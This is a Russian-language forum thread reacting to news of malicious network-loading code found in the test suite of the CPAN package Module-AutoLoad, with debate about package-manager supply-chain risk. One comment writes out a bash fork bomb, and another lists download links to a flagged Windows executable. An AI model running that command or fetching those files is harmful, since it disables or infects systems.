The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]



"В Perl-пакете Module-AutoLoad выявлен вредоносный код"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"В Perl-пакете Module-AutoLoad выявлен вредоносный код"  +/
Сообщение от opennews (??), 29-Июл-20, 11:49 
В распространяемом через каталог CPAN Perl-пакете Module-AutoLoad, предназначенном для автоматической загрузки  CPAN-модулей на лету, выявлен вредоносный код. Вредоносная вставка была найдена в коде теста 05_rcx.t, который поставляется с 2011 года...

Подробнее: https://www.opennet.ru/opennews/art.shtml?num=53448

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по ответам | RSS]

1. Сообщение от Аноним (1), 29-Июл-20, 11:49   –15 +/
cpan это зло
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #26, #27, #67

2. Сообщение от lurkr (ok), 29-Июл-20, 11:57   +20 +/
>> Данный скрипт загружает запутанный при помощи сервиса perlobfuscator.com код

перлу это не требуется, можно было оставить все как есть )))

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #4

3. Сообщение от user90 (?), 29-Июл-20, 11:58   +1 +/
Как-то ниачем: когда именно была сделана? С какого аккаунта? Шерлоки млин)
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #5

4. Сообщение от user90 (?), 29-Июл-20, 12:00   +12 +/
Ну как тебе сказать.. если попросить какого-нибудь петон-нуба, то у него именно так и выйдет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2

5. Сообщение от ss (??), 29-Июл-20, 12:00   +/
Там же сказано- автор впендюрил это туда для развлечения. шутка.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #6, #32

6. Сообщение от user90 (?), 29-Июл-20, 12:08   +1 +/
Читал по диагонали :)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #23

7. Сообщение от имя_ (?), 29-Июл-20, 12:25   +1 +/
святой перл, не то что эти смузихлебы! настоящие олды с бородой и свитером с оленями, лол.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #9

8. Сообщение от Аноним (9), 29-Июл-20, 12:28   –6 +/
В заброшенном репозитории заброшенного языка нашли уязвимость, которая ничего не делает потому что и язык и репозиторий заброшены.
Ответить | Правка | Наверх | Cообщить модератору

9. Сообщение от Аноним (9), 29-Июл-20, 12:29   +/
И трояны у них даже биткойны майнить не умеют потому что не посконно.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #7

10. Сообщение от mos87 (ok), 29-Июл-20, 12:34   +3 +/
что лишний раз показывает, неважно какой язык - люди всегда одинаковые.
Ответить | Правка | Наверх | Cообщить модератору

11. Сообщение от mos87 (ok), 29-Июл-20, 12:37   –1 +/
и вообще, остров Пасхи от этого все беды! На самом деле не пасха, а Песах!
Ответить | Правка | Наверх | Cообщить модератору

12. Сообщение от mos87 (ok), 29-Июл-20, 12:46   +1 +/
собсно в том треде от 2016 на SO почти всё сказано.
в т.ч. очевидная мыслЯ, что такую фигню использовать очень-очень айайай.

так что ССЗБ

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #17

13. Сообщение от Аноним (13), 29-Июл-20, 12:48   +/
Неужели perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' ?
Ответить | Правка | Наверх | Cообщить модератору

14. Сообщение от mos87 (ok), 29-Июл-20, 12:56   +/
perl -e "print 82.46.99.88" хехе.

18:38:44 < veesh> i just noticed now that the OP on the SO question was
asking how to port the code to python
18:39:00 < veesh> i'm glad that all those people left perl 20 years ago

))

Ответить | Правка | Наверх | Cообщить модератору

15. Сообщение от mos87 (ok), 29-Июл-20, 12:58   –4 +/
>Автор модуля также заверил, что выявленные манипуляции не совершают вредоносных действий, а лишь демонстрируют

что вся эта модная фигня хипсто- и макако- (на выбор) язычков не есть ничто новое. Но Perl жЫ УсТАрЕл!!111

ЗЫ более того, афтор сего творения подтралил в конце своего поста - "And I honestly don't know if Python is powerful enough to do anything like this"

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #91

16. Сообщение от yet another anonymous (?), 29-Июл-20, 13:15   +2 +/
Так дело не в языке. А в "автоподтягивании".
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #25

17. Сообщение от Аноним (17), 29-Июл-20, 13:18   –2 +/
Расту и ноде значит норм, а тут ай ай ай? Получаются, у перл разрабов культура напрочь отсутствует, раз они способны такое провернуть.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #12 Ответы: #19

19. Сообщение от mos87 (ok), 29-Июл-20, 13:21   +/
шта? ты либо нихера не понял либо напейсал херню, но вероятнее и то и другое
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #17 Ответы: #21

20. Сообщение от Sw00p aka Jerom (?), 29-Июл-20, 13:23   +/
Название модуля само за себя говорит, чему тут удивляться, автор решил ещё потестить загрузку через сеть :)
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #42, #83

21. Сообщение от Аноним (17), 29-Июл-20, 13:26   +/
Т.е. версии, что это ты тупорез, ты принципиально не рассматриваешь?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #19

22. Сообщение от Аноним (22), 29-Июл-20, 13:58   +1 +/
Всё правильно сделал. Нужно ещё было удаление всех доступных на запись файлов добавить. Ибо экосистемы пакетов и сложившиеся практики разработки ПО - это очень удобно для бэкдорщиков. Создаёшь полезный пакет, в него пихаешь зависимость от другого контролируемого собой (возможно под другим именем), рядом - ещё десяток, в свой - так же, и так пока не решишь, что пора вставить бэкдор. Никто и не найдёт - нет никому охоты в зависимостях копаться.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #28, #29

23. Сообщение от Q2W (?), 29-Июл-20, 14:00   +5 +/
Ну ты и Лестрейд, блин.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6

24. Сообщение от бублички (?), 29-Июл-20, 14:07   +5 +/
> пояснил, что он просто так развлекался

с привеликим удовольствием, съездил бы автору по щам. в целях развлечения конечно-же - не со зла или корысти

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #73

25. Сообщение от mos87 (ok), 29-Июл-20, 14:12   –1 +/
я об этом выше и постил
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #16 Ответы: #38

26. Сообщение от бублички (?), 29-Июл-20, 14:13   +12 +/
ты побежишь выбрасывать все ножи когда узнаешь сколько людей от них погибает ежегодно в одном только твоём Барнауле
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #31, #36

27. Сообщение от Аноним (27), 29-Июл-20, 14:30   –1 +/
npm - добро!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #49

28. Сообщение от Аноним (28), 29-Июл-20, 14:30   +1 +/
> Ибо экосистемы пакетов и сложившиеся практики разработки ПО - это очень удобно для бэкдорщиков.

Так можно сказать про что угодно.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #22

29. Сообщение от Аноним (29), 29-Июл-20, 14:36   +/
Других-то вариантов все равно нет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #22

30. Сообщение от Анонолекс (?), 29-Июл-20, 14:38   –1 +/
Люблю перл, но не люблю выёжибающихся брайнфакеров. С баш такого нет. Но у баш и cpan нет, так что переживать тоже нечего...
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #86

31. Сообщение от Аноним (31), 29-Июл-20, 14:42   –4 +/
В ауле Барна?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #26

32. Сообщение от Аноним (32), 29-Июл-20, 14:45   +4 +/
> Там же сказано- автор впендюрил это туда для развлечения. шутка.

Ну да. Выглядит как "он упал на мой пистолет и из-за чего произошло 4 выстрела в грудную клетку и один раз в затылок".

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

33. Сообщение от Аноним (31), 29-Июл-20, 14:45   +/
>Вредоносная вставка была найдена в коде теста 05_rcx.t, который поставляется с 2011 года. Примечательно, что вопросы о загрузке сомнительного кода возникали на Stackoverflow ещё в 2016 году.

Жить 9 лет с дырой. Поздравляю!

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #39

34. Сообщение от Аноним (34), 29-Июл-20, 14:51   –4 +/
Вот это новость. Вообще-то, в любом perl пакете есть вредоносный код.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #40, #43

35. Сообщение от Аноним (35), 29-Июл-20, 14:52   +/
А тесты они в каких ситуациях запускаются? Нужно было самому ручками их запускать?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #37

36. Сообщение от . (?), 29-Июл-20, 15:21   –1 +/
Вот же ж м-к. Бежать-то из того Барнаула надо было!

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #26

37. Сообщение от . (?), 29-Июл-20, 15:23   +/
CPAN.pm запустит. У них, вишь ли, не принято устанавливать модуль не выполнив тесты.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35

38. Сообщение от anonymous yet another (?), 29-Июл-20, 15:35   +/
Вызывает интерес ваш технический прогресс: как у вас там ...

К вопросу о подтягивании источников в процессе сборки:
node.js, busybox, buildroot, cargo (rust).  Другим так наисвежайшие .po при сборке подтянуть всенепременнейше необходимо.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #25 Ответы: #41

39. Сообщение от Аноним (39), 29-Июл-20, 15:36   –2 +/
Ровно столько сколько пыль с перла не стряхивали.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #33

40. Сообщение от Аноним (39), 29-Июл-20, 15:36   +/
Только про это никто уже не узнает.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #34

41. Сообщение от mos87 (ok), 29-Июл-20, 15:57   –2 +/
любой калькулятор обязан тащить за собой ОС
желательно, не одну.

ЗЫ *антерес

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #38

42. Сообщение от mos87 (ok), 29-Июл-20, 16:00   +/
собсно автор это и расписал на СО
а всякие упоминания ботов и джейлов говорит добавил по приколу

вообще забавно, стандартная фича всех модно-проЭктов же
без которых хипстодевы жить уже не могут)

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #20

43. Сообщение от mos87 (ok), 29-Июл-20, 16:00   +1 +/
да. потому что они дело делают.
некоторым это вредно - как аллергия на всякого рода труд.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #34

44. Сообщение от Аноним (44), 29-Июл-20, 16:09   +2 +/
И да восславим же святой опенсорс, где миллионы глаз неустанно бдят за отсутствием закладок в коде!
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #45, #65

45. Сообщение от mos87 (ok), 29-Июл-20, 16:13   –1 +/
а мильярды жырных анонов толсто недотралят
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44

46. Сообщение от Аноним (46), 29-Июл-20, 16:22   +/
Свежая статья по теме:

Backstabber’s Knife Collection: A Review of Open Source Software Supply Chain Attacks

https://arxiv.org/pdf/2005.09535.pdf

"This paper presents a dataset of 174 malicious software packages that were used in real-world attacks on open source software supply chains,and which were distributed via the popular package repositories npm, PyPI,  and  RubyGems."

Ответить | Правка | Наверх | Cообщить модератору

47. Сообщение от Аноним (47), 29-Июл-20, 16:38   +/
У кого в iptables/nftables разрешёно обращение к внешним адресам по порту 1?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #63

49. Сообщение от Аноним (49), 29-Июл-20, 16:51   +/
war is peace
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #27

50. Сообщение от Аноним (50), 29-Июл-20, 16:56   +/
Там по адресу "ww.limera1n.com" - сайт -
http://www.limera1n.com/
http://www.limera1n.com/limera1n.exe
Virustotal https://www.virustotal.com/gui/file/df66bbf8308d20adb056b639...
пишет -  "Trojan.GenericKD.Win32.245152" и т.п.
Ответить | Правка | Наверх | Cообщить модератору

51. Сообщение от ann (??), 29-Июл-20, 17:44   +/
Вот она сила этих всяких автоматически подгружаемых модулей и библиотек. Которую так любят неосиляторы пакетых менеджеров операционной системы.

Во все языки уже пихают эти менеджеры, питон, раст, теперь и в перл. Наделюсь до нормальных языков эта болезнь не дойдёт.

Ответить | Правка | Наверх | Cообщить модератору
Ответы: #56, #75, #84

52. Сообщение от Повидло19 (?), 29-Июл-20, 17:53   +/
> коды символов 82.46.99.88 соответствуют тексту "R.cX"

Мне кажется, это не просто коды символов, а адрес IP. Динамит меня раздери!

Ответить | Правка | Наверх | Cообщить модератору

53. Сообщение от Повидло19 (?), 29-Июл-20, 17:55   +/
Запомните дети, тесты не должны лезть в сеть.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #57, #79

56. Сообщение от анонн. (?), 29-Июл-20, 18:04   –1 +/
> Вот она сила этих всяких автоматически подгружаемых модулей и библиотек. Которую так любят неосиляторы пакетых менеджеров операционной системы.
> Во все языки уже пихают эти менеджеры, питон, раст, теперь и в перл.
> теперь и в перл
> уже пихают
>> CPAN: 1993-95 год

https://www.ctan.org/ctan
>> CTAN was built in 1992, by Rainer Schoepf and Joachim Schrod in Germany, Sebastian Rahtz in the UK, and George Greenwade in the US

Вот она сила этих всяких то ли маклаудов-осиляторов, то ли тех, кто сначала опоздал родиться, затем не захотел разбираться, но имел ценное мнение ...

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #51 Ответы: #59

57. Сообщение от ann (??), 29-Июл-20, 18:17   –1 +/
А когда код с сетью и связан?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #53 Ответы: #58, #71

58. Сообщение от Повидло19 (?), 29-Июл-20, 18:18   +/
Солнышко, это должна быть отдельные тесты, уже системные или интеграционные.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #57 Ответы: #60

59. Сообщение от ann (??), 29-Июл-20, 18:21   +/
Ты сам ответил 1992-ой. Тогда люди дело делали и задачи решали в большинстве своём (конечно всякие ... всегда были и будут). А сейчас в большинстве своём пихают трояны и рекламу. В этом и разница. Тогда это делали инженеры, сейчас обезьянки и эта идея - дырище.

Перл ещё и за свою специфику долго не имел с этим проблем. Не каждый ослит, а обезьянки и подавно.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #56

60. Сообщение от ann (??), 29-Июл-20, 18:23   +/
Да, верно, и в идеале внутри изолированной сети. Но тем не менее это тесты. Тестировать в сети можно много всего, реализацию сетевых протоколов любого уровня, нагрузку и т.д.

У меня много тестов в сети гоняют протокол прикладного уровня, но сеть да, изолированна.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #58

61. Сообщение от Онаним (?), 29-Июл-20, 18:44   –1 +/
Ахах блджад, очередной авторепозипопоторий поимели.
Сколько раз говорилось уже...
Ответить | Правка | Наверх | Cообщить модератору

62. Сообщение от Аноним (62), 29-Июл-20, 19:56   –1 +/
Согласен, cpan - это очень мутная тема
Ответить | Правка | Наверх | Cообщить модератору

63. Сообщение от Аноним (63), 29-Июл-20, 20:21   +1 +/
Почти у всех. Мало кто исходящие соединения вообще контролирует. Если запрещать всё по умолчанию, то рано или поздно проклянешь себя за это. Ибо в современных системах невозможно знать всё о том, что куда, зачем и почему.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #47 Ответы: #64

64. Сообщение от Аноним (64), 29-Июл-20, 20:28   +1 +/
Потому что пакетного файервола мало, нужен ещё файервол приложений.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63 Ответы: #68, #69

65. Сообщение от НяшМяш (ok), 29-Июл-20, 21:01   –3 +/
> миллионы глаз
> Perl

забавно

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #44

66. Сообщение от Аноним (66), 29-Июл-20, 21:28   +3 +/
Это СПО? да
Автор просто развлекался? да
Тогда все нормально
Ответить | Правка | Наверх | Cообщить модератору

67. Сообщение от Онаним (?), 29-Июл-20, 22:00   +/
cpan, npm, composer и прочие извращения
А вообще зло - те, кто не ревьюит разнородный хлам, который тянется в проект.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1

68. Сообщение от _ (??), 29-Июл-20, 22:12   +/
Ну у вас в форточке - есть. И что помогло оно вам ? :-D
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #64

69. Сообщение от Карабьян (?), 29-Июл-20, 22:32   +/
Посоветуйте норм сабж кроме ufw
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #64 Ответы: #74

71. Сообщение от бублички (?), 29-Июл-20, 23:17   +/
несколько лет писал на Perl. что из тестов невозможно воспроизвести на localhost и по какой причине? поиск котиков/порнухи в Google?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #57

72. Сообщение от Аноним (72), 29-Июл-20, 23:38   +/
>вредоносный код подставлен после взлома его сайта "r.cx" и пояснил, что он просто так развлекался

Целевая атака. Цели отдаётся боевое, остальным - безобидное.

Его следует засудить за такое. Со стороны пользователей - за НСД и вредоносное ПО. Со стороны geohotа - за DDoS-атаку.

Ответить | Правка | Наверх | Cообщить модератору

73. Сообщение от Инквизитор (?), 30-Июл-20, 00:19   –3 +/
А где же тут fun?

Вот если, скажем, сперва оскопить раскаленными клещами (зачем нам от такого потомство?), потом на колесе немножечко покрутить, то можно и к потрошению приступать...

Вешать, после неприятной истории с одним Анонимусом, лучше уже после, а не до.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24 Ответы: #88

74. Сообщение от . (?), 30-Июл-20, 00:28   +/
ufw файрволом приложений не является. Обычная поделка л@п4@атых поверх пакетного фильтра для альтернативно-т4пых, неспособных настроить iptables.

Файрволами приложений являются коробочки paloalto networks, checkpoint ngfw, cisco firepower и им подобные. К сожалению, ценник вас не порадует.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #69 Ответы: #76

75. Сообщение от . (?), 30-Июл-20, 00:38   +1 +/
> Которую так любят неосиляторы пакетых менеджеров операционной системы.

в случае с перлом претензии к неосиляторству следует предъявлять таки авторам пакетных менеджеров. Вполне очевидно, почему не надо пихать весь CPAN в пакеты - они никогда и никому не понадобятся, а через неделю половина устареет.

Возможно, если бы они не были ниасиляторами, бросившими свои поделки еще в 90е - мы бы и не увидели всю эту мерзость, качающую пол-интернета в хомяк.
Ибо как раз у CPAN.pm есть механизм интеграции с системным пакетным менеджером, позволяющий установленные им пакеты отдать под его управление, чтобы их было в нем видно, чтобы можно было потом удалить, правильно обработав зависимости. И ни одна скотина, кроме разработчиков freebsd, этот механизм использовать не осилила.

Поэтому авторы всяких пихонов с хрустами уже и не парились.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #51

76. Сообщение от Карабьян (?), 30-Июл-20, 00:45   +/
> ufw файрволом приложений не является. Обычная поделка л@п4@атых поверх пакетного фильтра
> для альтернативно-т4пых, неспособных настроить iptables.
> Файрволами приложений являются коробочки paloalto networks, checkpoint ngfw, cisco firepower
> и им подобные. К сожалению, ценник вас не порадует.

Благодарю. А как они добились того, что иптейблз фильтрует трафик отдельных приложений? Я, увы, в нем умею настраивать фильтровацию только отдельных пользователей/групп, был бы признателен за подсказку

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #74

77. Сообщение от Аноним (77), 30-Июл-20, 00:54   +/
С одной стороны шалости молодости понять можно, а с другой стороны это либо сделано целенаправлено, либо автор еще не вырос из пеленок. Поэтому считаю правильным то, что модуль заблокировали. За 9 лет можно было избавиться от этой порнографии.
Ответить | Правка | Наверх | Cообщить модератору

79. Сообщение от cheater (?), 30-Июл-20, 10:24   +/
> Запомните дети, тесты не должны лезть в сеть.

По-твоему в этом состоит проблема, вскрытая автором? Ну замени слова "скрипт загружает пейлоад по сети" на "скрипт удаляет ~", сильно тебе поможет что скрипт не лезет в сеть?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #53

80. Сообщение от cheater (?), 30-Июл-20, 10:25   +/
С волчьим билетом из CPAN. Для развлечений есть локалхост.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #81

81. Сообщение от Аноним (81), 30-Июл-20, 11:43   +/
>Интересно, что к обсуждению подключился и автор модуля

Вот автора модуля, надо с волчьим билетом.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #80

83. Сообщение от YetAnotherOnanym (ok), 30-Июл-20, 12:39   +/
> автор решил ещё потестить загрузку через сеть

Больше похоже на то, что автор решил потестить умственные способности своих коллег.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #20

84. Сообщение от Вы забыли заполнить поле Name (?), 30-Июл-20, 12:40   +/
> Которую так любят неосиляторы пакетых менеджеров операционной системы.

Дык это не работает. Вот есть у тебя модуль на питоне и ты будешь собирать пакеты для всех дистритбутивов что ли?

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #51

85. Сообщение от YetAnotherOnanym (ok), 30-Июл-20, 12:51   +/
В этом отношении мне нравится rebar - можно отревизить зависимость и прибить гвоздями ту её версию, в которой ты уверен. И пусть там кто угодно что угодно в новые версии пихает - будет установлена доверенная версия или будет ошибка.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #87

86. Сообщение от PnD (??), 30-Июл-20, 14:10   +/
Ну конечно.
:(){ :|:& };:
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #30 Ответы: #89

87. Сообщение от Аноним (22), 30-Июл-20, 14:12   +/
Ну отлично. Поставишь изначально бекдорнутую версию, а обновление, выпиливающее бэкдор, замаскированный под уязвимость, не придёт.

От бэкдоров и уязвимостей не спасёт прибивание гвоздями версий. От бэкдоров спасёт только создание полностью своей экосистемы и использование только её. Начинать придётся с создания полностью своей науки, потому что бекдоры могут быть и в научных статьях - автор мог придумать атаку, и сделать исследование так, чтобы из него следовало, как будто атака невозможна, при этом автор специально поставил эксперимент так, чтобы результаты, из которых следовала возможность такой атаки, не воспроизводились в такой постановке. Потом придётся создавать свою промышленность, всю свою, полностью, от кремния и меди до инструментов и свой рынок. На этом этапе придут патентные тролли и ты пойдёшь валить лес. До создания своего софта ты тогда уже не дойдёшь. Но можешь начать с софта, опять же полностью с нуля, ROM, компилятор, ОС, все библиотеки - это всё придётся создать самому. Разумеется всё писать и отлаживать на бумажке. И тогда ты можешь быть уверен - все уязвимости в софте - твои, а не дяди Cэма или дяди Ляо.

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #85 Ответы: #90

88. Сообщение от бублички (?), 30-Июл-20, 23:46   –1 +/
тебе к специалисту бы обратиться - выслушает твои фантазии, таблеточки выпишет или терапию порекомендует. ты больной человек, судя по твоей писанание
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #73

89. Сообщение от Тот самый Ne01eX (?), 31-Июл-20, 05:07   +/
А вот матом ругаться было не обязательно... :-)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #86

90. Сообщение от benu (ok), 31-Июл-20, 16:33   +/
Весь мир держится на доверии. Ты доверяешь повару в ближайшей кафешке, он доверяет автослесарю, который чинит его тачку и т.д.
Сколько ещё проживёт наш мир?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #87 Ответы: #96

91. Сообщение от Убить_Криса (?), 01-Авг-20, 10:07   +/
бп. Точно так же можно написать свой лоадер модулей и при import some грузить че-угодно откуда угодно
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #15

95. Сообщение от Аноним (95), 07-Авг-20, 08:51   +/
Ну, не прикол, конечно, а ботнет:

http://www.r.cx/faq.html

A: RCX means Remote Code eXecution, the framework used by PerlObfuscator.Com

Ответ: платформе rcx означает удаленное выполнение кода, в рамках используемого PerlObfuscator.Com

Ответить | Правка | Наверх | Cообщить модератору

96. Сообщение от banya39 (ok), 10-Авг-20, 11:21   +/
> Весь мир держится на доверии. Ты доверяешь повару в ближайшей кафешке, он
> доверяет автослесарю, который чинит его тачку и т.д.
> Сколько ещё проживёт наш мир?

Долго

Ответить | Правка | Наверх | Cообщить модератору
Родитель: #90


Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру